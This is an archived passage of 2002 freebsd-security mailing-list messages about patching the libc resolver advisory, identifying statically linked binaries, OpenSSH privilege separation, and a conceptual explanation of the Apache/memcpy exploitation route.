freebsd-security@freebsd.org Received: from tomts14-srv.bellnexxia.net (tomts14.bellnexxia.net [209.226.175.35]) by hub.freebsd.org (Postfix) with ESMTP id 95C0537C715 for ; Wed, 26 Jun 2002 16:57:59 -0700 (PDT) Received: from shall.anarcat.ath.cx ([65.94.191.134]) by tomts14-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020626235803.GBSU20747.tomts14-srv.bellnexxia.net@shall.anarcat.ath.cx>; Wed, 26 Jun 2002 19:58:03 -0400 Received: from lenny.anarcat.ath.cx (lenny.anarcat.ath.cx [192.168.0.4]) by shall.anarcat.ath.cx (Postfix) with SMTP id C542B5; Wed, 26 Jun 2002 19:59:37 -0400 (EDT) Received: by lenny.anarcat.ath.cx (sSMTP sendmail emulation); Wed, 26 Jun 2002 19:55:26 -0400 Date: Wed, 26 Jun 2002 19:55:26 -0400 From: The Anarcat To: Brett Glass Cc: "H. Wade Minter" , freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020626235526.GE1041@lenny.anarcat.ath.cx> Mail-Followup-To: Brett Glass , "H. Wade Minter" , freebsd-security@freebsd.org References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <4.3.2.7.2.20020626143023.022716c0@localhost> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="sDKAb4OeUBrWWL6P" Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020626143023.022716c0@localhost> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --sDKAb4OeUBrWWL6P Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed Jun 26, 2002 at 02:37:27PM -0600, Brett Glass wrote: > At 01:26 PM 6/26/2002, H. Wade Minter wrote: >=20 > >So am I correct in assuming that this fix requires a complete system > >rebuild (make buildworld) as opposed to just rebuilding a particular > >module? >=20 > Worse than that. Every package or port must be reinstalled > or rebuilt too. Every package that is statically linked against libc, of course. > Ditto everything you've built from source. A. --=20 Pemature optimization is the root of all evil - Donald Knuth --sDKAb4OeUBrWWL6P Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GlRuttcWHAnWiGcRAsT6AJ9HFHDwU5YRHffXKrwA/jnMpXUTVACfR8xI GhtmDdVR/L9VPYoo4KUPtz8= =MPee -----END PGP SIGNATURE----- --sDKAb4OeUBrWWL6P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18: 9:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.root.nis.za (decoder.geek.sh [196.36.198.81]) by hub.freebsd.org (Postfix) with ESMTP id 8138837C7BF for ; Wed, 26 Jun 2002 16:59:39 -0700 (PDT) Received: from aragon (na.sdn.net.za [66.8.86.210]) (using TLSv1 with cipher RC4-MD5 (128/128 bits)) (Client did not present a certificate) by mail.root.nis.za (Postfix) with SMTP id 58FE124F03; Thu, 27 Jun 2002 01:59:29 +0200 (SAST) Message-ID: <000f01c21d6d$99949ed0$01000001@aragon> From: "Aragon Gouveia" To: "Brett Glass" Cc: References: <4.3.2.7.2.20020626143023.022716c0@localhost> <4.3.2.7.2.20020626151157.02193340@localhost> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Date: Thu, 27 Jun 2002 02:00:04 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > But, again, it may be possible to defuse the bug without > tearing the whole system apart. After all, if resolv.conf > points the query at a locally running copy of, say, > BIND or djbdns, and the daemon blocks the exploit, you're > safe. Same if you query a domain name server (on the same > host or not) and *it* blocks the exploit. So, fixing the > problem might be as simple as turning on named and modifying > resolv.conf. Maybe also add some firewall rulesets to block spoofed packets from say, 127.0.0.1, entering your public interface. Regards, Aragon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:12: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.csh.rit.edu [129.21.60.134]) by hub.freebsd.org (Postfix) with ESMTP id E7AA637C865 for ; Wed, 26 Jun 2002 17:02:15 -0700 (PDT) Received: by hex.databits.net (Postfix, from userid 1001) id 2C6052111C; Wed, 26 Jun 2002 20:02:15 -0400 (EDT) Date: Wed, 26 Jun 2002 20:02:15 -0400 From: Pete Fritchman To: Henk Wevers Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020626200215.B80485@absolutbsd.org> References: <3D1A3153.6000704@wevers.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D1A3153.6000704@wevers.org>; from henk@wevers.org on Wed, Jun 26, 2002 at 11:25:39PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ++ 26/06/02 23:25 +0200 - Henk Wevers: | Does this mean that if you just build OpenSSH 3.4.p1, you must build | this again with the new world? NO_OPENSSH= true in /etc/make.conf. --pete -- Pete Fritchman [petef@(databits.net|freebsd.org|wyom.net)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:14:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.csh.rit.edu [129.21.60.134]) by hub.freebsd.org (Postfix) with ESMTP id 71F6837C8D1 for ; Wed, 26 Jun 2002 17:04:10 -0700 (PDT) Received: by hex.databits.net (Postfix, from userid 1001) id 17C5521117; Wed, 26 Jun 2002 20:04:10 -0400 (EDT) Date: Wed, 26 Jun 2002 20:04:10 -0400 From: Pete Fritchman To: Brian Behlendorf Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020626200410.C80485@absolutbsd.org> References: <20020626152851.Q310-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org>; from brian@hyperreal.org on Wed, Jun 26, 2002 at 03:29:45PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [ belongs on -questions ] ++ 26/06/02 15:29 -0700 - Brian Behlendorf: | Sorry for the newbie question here, but is there a way to programmatically | determine which binaries on a system static-linked libc? I tried "nm" but | that needs non-stripped executables... Try file(1) or ldd(1). --pete -- Pete Fritchman [petef@(databits.net|freebsd.org|wyom.net)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:19:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 63E4837CCE2 for ; Wed, 26 Jun 2002 17:20:33 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id KAA09424; Thu, 27 Jun 2002 10:20:27 +1000 (EST) From: Darren Reed Message-Id: <200206270020.KAA09424@caligula.anu.edu.au> Subject: Re: Wow To: kelp@plek.org (Travis Cole) Date: Thu, 27 Jun 2002 10:20:27 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020626212812.GA55744@ainaz.pair.com> from "Travis Cole" at Jun 26, 2002 05:28:14 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Travis Cole, sie said: > > On Wed, Jun 26, 2002 at 01:20:57PM -0700, Chris Doherty wrote: > > At some point, Theo de Raadt said: > > > I've barely slept in a week. > > > > for myself with my one machine, I'm just annoyed. if I had gone through > > this bullshit on 40 machines, when I could have just modified a config > > file, I'd be pissed, and rightfully so. > > > > but, *shrug*. I'll not give such credence to vague warnings in the > > future--lesson learned. > > Well, the fact is they just released 5600 lines of fixes and such > for OpenSSH. Theo said they reviewed ~5600 lines of code, not made 5600 lines of fixes. > Thats a big patch. That's a big difference to what you said. > And Theo has said there are probably other holes in there. I think I > trust him on that. But he doesn't know. Doesn't that alarm you? Aren't you concerned that if they don't know if other holes were there, waiting, that they could easily add in more new ones? Just like they did when they added this one in 2.9.9? [...] > They fix bugs. Bugs can cause security holes. They also introduce bugs. Some of these bugs have caused security holes. [...] > And the PrivSep does reduce the chances of any still existing > bugs causing real security issues. Which begs the question, why is it disabled by default, at all ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:20:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d185.as9.nwbl0.wi.voyager.net [169.207.133.251]) by hub.freebsd.org (Postfix) with ESMTP id 9B2F937DAD8 for ; Wed, 26 Jun 2002 18:15:38 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.4/8.12.4) with ESMTP id g5R1Hvcv065466; Wed, 26 Jun 2002 20:17:57 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.4/8.12.4/Submit) with ESMTP id g5R1Htq7065463; Wed, 26 Jun 2002 20:17:57 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Wed, 26 Jun 2002 20:17:55 -0500 (CDT) From: Mike Silbersack To: Julian Elischer Cc: security@freebsd.org Subject: Re: FreeBSD vuln... In-Reply-To: Message-ID: <20020626201647.X65219-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Julian Elischer wrote: > now we are replacing apace on their systems but does anyone know what the > memcpy bug is? > > I know that the OpenBSD exploit aparently uses memcpy but does anyone have > details on the FreeBSD exploit? > > (private mails encouraged) > > Julian The memcpy "bug" is the same on FreeBSD and OpenBSD, it's the vector that lets you get nobody access. Breaking into root would have to be through some local hole. (AFAIK) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:21: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from gate.volant.org (gate.volant.org [207.111.218.246]) by hub.freebsd.org (Postfix) with ESMTP id 1219F37C049 for ; Wed, 26 Jun 2002 17:23:12 -0700 (PDT) Received: from 216-55-134-176.dsl.san-diego.abac.net ([216.55.134.176] helo=[192.168.0.13]) by gate.volant.org with asmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.33 #1) id 17NN3n-000J98-00; Wed, 26 Jun 2002 17:22:55 -0700 Date: Wed, 26 Jun 2002 17:22:53 -0700 From: Pat Lashley To: Poul-Henning Kamp , FreeBSD Security Mailling List Subject: Jailing SSHd [Was: Re: OpenSSH Security (just a question, please no f-war)] Message-ID: <2849830000.1025137373@mccaffrey.phoenix.volant.org> X-Mailer: Mulberry/2.2.1 (Linux/x86 Demo) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="==========236915482==========" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --==========236915482========== Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline --On Wednesday, June 26, 2002 09:07:36 PM +0200 Poul-Henning Kamp=20 wrote: > Which reminds me that we should really tweak the code and put it in a > jail instead of a chroot. Careful there. Some of us are using SSH to log into jails running virtual hosting environments. The default installation needs to be able to run if it is already within a jail when sshd is started. -Pat --==========236915482========== Content-Type: application/pgp-signature Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GlrdncYNbLD8wuMRAnHAAJ9E54OecqxkXB87x5h3JUaWYCk8DgCg5eqj 6nj4hTDt4Nk4yrrKhlse0aU= =MAfR -----END PGP SIGNATURE----- --==========236915482==========-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:21:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id B73F037DC2A for ; Wed, 26 Jun 2002 18:19:56 -0700 (PDT) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5R1Iom0030235; Thu, 27 Jun 2002 11:18:50 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206270118.g5R1Iom0030235@drugs.dv.isc.org> To: Brett Glass Cc: security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-reply-to: Your message of "Wed, 26 Jun 2002 18:55:37 CST." <4.3.2.7.2.20020626185228.00e8ad60@localhost> Date: Thu, 27 Jun 2002 11:18:50 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > At 06:12 PM 6/26/2002, Mark.Andrews@isc.org wrote: > > > Provided you are behind a nameserver you trust that reconstructs > > the answer you should be fine. > > > > BIND 9 reconstucts all answers (excluding forwarded UPDATES). > > BIND 8 forwards some and reconstructs others. > > Could an exploit be set up as a forwarded UPDATE? No. > (Forgive me if > this is a naive question; I know that I need to become more familiar > with DDNS.) If not, then installing BIND 9 and/or forcing clients > to consult a BIND 9 server may be an acceptable workaround. > > --Brett > -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:22: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 4816A37BC84 for ; Wed, 26 Jun 2002 17:37:52 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id KAA13447; Thu, 27 Jun 2002 10:37:45 +1000 (EST) From: Darren Reed Message-Id: <200206270037.KAA13447@caligula.anu.edu.au> Subject: Re: Wow To: kelp@plek.org (Travis Cole) Date: Thu, 27 Jun 2002 10:37:45 +1000 (Australia/ACT) Cc: petr@blade-runner.mit.edu (Petr Swedock), freebsd-security@FreeBSD.ORG In-Reply-To: <20020626214005.GC53981@ainaz.pair.com> from "Travis Cole" at Jun 26, 2002 05:40:05 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Travis Cole, sie said: [...] > And then of course there is ISS... I don't have any good words to > say about them. [...] I believe ISS released the advisory because there were already working exploits in circulation, by that time. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:25: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7368737D291; Wed, 26 Jun 2002 17:44:13 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 990825361; Thu, 27 Jun 2002 02:44:06 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Henk Wevers Cc: Robert Watson , freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: <3D1A3153.6000704@wevers.org> From: Dag-Erling Smorgrav Date: 27 Jun 2002 02:44:05 +0200 In-Reply-To: <3D1A3153.6000704@wevers.org> Message-ID: Lines: 9 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Henk Wevers writes: > Does this mean that if you just build OpenSSH 3.4.p1, you must build > this again with the new world? No. It's dynamically linked, and will use the new libc. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:29: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3D1DF37B6BC; Wed, 26 Jun 2002 17:46:09 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 746A25361; Thu, 27 Jun 2002 02:46:05 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Brian Behlendorf Cc: Robert Watson , freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: <20020626152851.Q310-100000@yez.hyperreal.org> From: Dag-Erling Smorgrav Date: 27 Jun 2002 02:46:04 +0200 In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brian Behlendorf writes: > Sorry for the newbie question here, but is there a way to programmatically > determine which binaries on a system static-linked libc? Everything in /bin and /sbin is statically linked, and practically anything that isn't some kind of script uses libc. This basically boils down to "if it's in /bin or /sbin and does DNS lookups, you'll have to rebuild it". DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:29:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from alive.znep.com (sense-sea-MegaSub-1-448.oz.net [216.39.145.194]) by hub.freebsd.org (Postfix) with ESMTP id 78F1837DCF8 for ; Wed, 26 Jun 2002 18:25:32 -0700 (PDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.3/8.9.3) with ESMTP id SAA08122; Wed, 26 Jun 2002 18:25:28 -0700 (PDT) (envelope-from marcs@znep.com) Date: Wed, 26 Jun 2002 18:25:28 -0700 (PDT) From: Marc Slemko To: Julian Elischer Cc: security@FreeBSD.ORG Subject: Re: FreeBSD vuln... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Julian Elischer wrote: > > The security officers of one of our clients (a large bank) tells us: > ----begin quote--- > The Apache hole itself only allows you to execute code as Nobody, but > there > is a working exploit in the wild now that first exploits Apache and then a > bug in memcpy on FreeBSD to gain a root shell. So at this time we are > vulnerable to a remote root exploit. > > ------- end quote > > now we are replacing apace on their systems but does anyone know what the > memcpy bug is? > > I know that the OpenBSD exploit aparently uses memcpy but does anyone have > details on the FreeBSD exploit? (not sent privately since others could be confused) The wording is inaccurate. There is a bug in Apache. It allows you, on some platforms, to gain a shell as the user Apache runs as. On *BSD (well, on x86 at least), this is done through a bug/feature of memcpy related to negative lengths, copying backwards to handle overlapping copies, and reloading the length from the stack into a register. For details on the memcpy() issue, see http://online.securityfocus.com/archive/1/278270/2002-06-17/2002-06-23/0 No question, the real bug is in Apache for passing in a negative length, however the particular exploit only works due to some very interesting details of how memcpy() is doing things that could arguably be called wrong. As for the root compromise, on the vast majority of systems if you compromise the user Apache runs as, you are going to be able to exploit some other completely unrelated pre-existing bug on the system to gain root. This is completely unrelated to memcpy(). Net, Open, and FreeBSD share the same x86 assembly memcpy() implementation from way back, and are all exploited in the same fashion. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:29:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 4619D37D5D9 for ; Wed, 26 Jun 2002 17:52:13 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5R0qAw6019343; Wed, 26 Jun 2002 20:52:10 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 20:52:10 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Brian Behlendorf Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brian Behlendorf wrote: > On Wed, 26 Jun 2002, Robert Watson wrote: > > You will catch most applications simply by rebuilding libc and > > reinstalling. Unfortunately, some applications are statically linked, and > > they must be individually relinked against the new libc and reinstalled. > > Sorry for the newbie question here, but is there a way to > programmatically determine which binaries on a system static-linked > libc? I tried "nm" but that needs non-stripped executables... Well, there are a number of gradations of "dynamically" and "statically" linked, but from a practical perspective there are two ways to figure out how something is linked. First, look at the binary itself on an installed system, perhaps using the file command: curry:~/freebsd/src/bin> file /usr/bin/add* /usr/bin/addftinfo: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped /usr/bin/addr2line: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped The other is to look in the FreeBSD source tree to see whether the binary is built with NOSHARED. For example: curry:~/freebsd/src> grep -i SHARED bin/Make* bin/Makefile.inc:NOSHARED?= YES Because of the recursive build infrastructure, using the first of these may be easiest if your source tree and system are already in sync. The other wrinkle is that not all statically linked binaries *use* the DNS calls, and only those that actually use the call really need to be reinstalled. You can use nm to inspect the binary and see if it does use any DNS calls, or if it relies on any calls that use DNS calls, but again, the simplist approach might just be to replace all of them to make sure you don't miss anything. Regardless of your approach for statis binaries, you will need to rebuilt the dynamic libc library from a fixed source tree to get all the dynamically linked applications. Also, run file on /usr/local/{bin,sbin} to make sure no ports installed statically that require updating. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:30:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 4087C37D61E for ; Wed, 26 Jun 2002 17:54:36 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5R0sYw6019435; Wed, 26 Jun 2002 20:54:34 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 20:54:34 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Henk Wevers Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <3D1A3153.6000704@wevers.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Henk Wevers wrote: > Does this mean that if you just build OpenSSH 3.4.p1, you must build > this again with the new world? If the OpenSSH binaries are dynamically linked against the version of libc you are replacing, you don't need to rebuild OpenSSH, since it will just automatically pick up the change. Do make sure you restart the sshd process after the upgrade, however, or it could use a cached copy of the library in memory (as with any other binary). While you can do all this without reboots, the best way the guarantee the instances of the library have been replaced is to reboot. Yeah, I know that's the evil windows thing, but it will work. The other way to do this is to track down any executing binary that might have linked/dynamically linked against the old version of the library, and make sure it's restarted using a rebuilt version of the application. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:39: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id 2683437D9CA; Wed, 26 Jun 2002 18:08:55 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id 655CE1371D; Wed, 26 Jun 2002 18:10:33 -0700 (PDT) Date: Wed, 26 Jun 2002 18:08:42 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: chris@aims.com.au, rwatson@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: RE: Wow Message-ID: <2147483647.1025114921@[192.168.4.154]> In-Reply-To: <012e01c21d6c$e16ce9c0$020aa8c0@aims.private> References: <012e01c21d6c$e16ce9c0$020aa8c0@aims.private> X-Mailer: Mulberry/3.0.0a3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --On Thursday, June 27, 2002 9:54 AM +1000 Chris Knight wrote: [snip] > Isn't the merge a little bit hasty? According to the advisory, the > least intrusive change to -STABLE would be to uncomment the > ChallengeResponseAuthentication in /usr/src/crypto/openssh/sshd_config. > The PAM issues appear to only be in 2.9.9+. > Also, my understanding of the advisory is that the exploit hasn't been > fixed - it's just that Privilege Separation will limit the exploit to > a chrooted environment with minimal permissions. > Please correct me if I'm wrong. 3.4 is patched. I'm not sure if they're still doing 3.3p1 for -STABLE, but I wouldn't think so. If 3.4 will be the new version in FreeBSD, then that will patch this bug and some other while providing the benefit of privsep in addition. Cheers, -JD- -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:39:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from blue.gerhardt-it.com (gw.gerhardt-it.com [204.83.38.103]) by hub.freebsd.org (Postfix) with ESMTP id B6A7537BDAB for ; Wed, 26 Jun 2002 18:22:14 -0700 (PDT) Received: from [192.168.100.111] (gw.gerhardt-it.com [204.83.38.103]) by blue.gerhardt-it.com (Postfix) with ESMTP id 730BEFD94 for ; Wed, 26 Jun 2002 19:22:13 -0600 (CST) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 26 Jun 2002 